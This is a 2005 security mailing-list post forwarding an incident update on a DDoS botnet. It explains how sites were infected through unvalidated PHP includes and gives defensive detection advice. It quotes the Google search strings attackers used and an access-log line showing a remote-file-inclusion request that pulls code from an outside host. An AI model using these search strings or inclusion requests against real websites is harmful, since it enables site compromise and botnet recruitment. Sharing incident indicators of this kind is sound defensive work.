[Dshield] [Fwd: Re:Destructive botnet originating from Japan]

Chris Brenton cbrenton at chrisbrenton.org
Sat Dec 24 22:00:26 GMT 2005


The plot thickens...

-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Sat, 24 Dec 2005 10:44:10 -0800
> 
> Here is a little update:
> 
> As of last night authorities were able to seize the IRC server from  
> the ISP in Japan and there will be extensive follow-up it.  The DDoS  
> attack is now running headless in the happy range of about 3+ Gbps at  
> around 7-9M PPS.  The bots will continue attacking us until they  
> receive the stop command from the bot master, there will never be a  
> stop command, so we will continue to see packet love for a few months  
> while people find that they are attacking us.  We will publish a new  
> list of the bots on Monday as we idle with this low traffic rate over  
> the weekend.
> 
> The attacker was targeting a couple customers that came into our  
> environment after other solutions failed to work for them.  After  
> reviewing and comparing notes, it is obvious that the attacks were  
> assassination attempts from a competitor.  There was no extortion  
> involved.
> 
> If you want to get the bots off your network, watch flow data  
> destined to AS32787 with SYN floods to TCP 80 as the destination.
> 
> Sites that use a PHP include (without validating the strings) to pull- 
> up different web sections and pages are at risk, a lot of people are  
> reporting infection via "$section.php" and "$page.php", the attacker  
> appears to have used Google to locate sites that use includes in that  
> fashion (searching "index.php?page=" or "index.php?section=").
> 
> Reviewing infected machines for logs related to 210.170.60.2 would be  
> easy to locate a past infection but may not be reliable if the  
> attacker starts a new botnet.  An example of the log data looks  
> something like this:
> grep 210.170.60.2 access_log
> 210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php? 
> section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
> 
> 
> Happy hunting and have nice holidays!
> 
> 
> -Barrett
> 
> --
> Barrett Lyon
> CTO and founder
> Prolexic Technologies, Inc
> 



More information about the list mailing list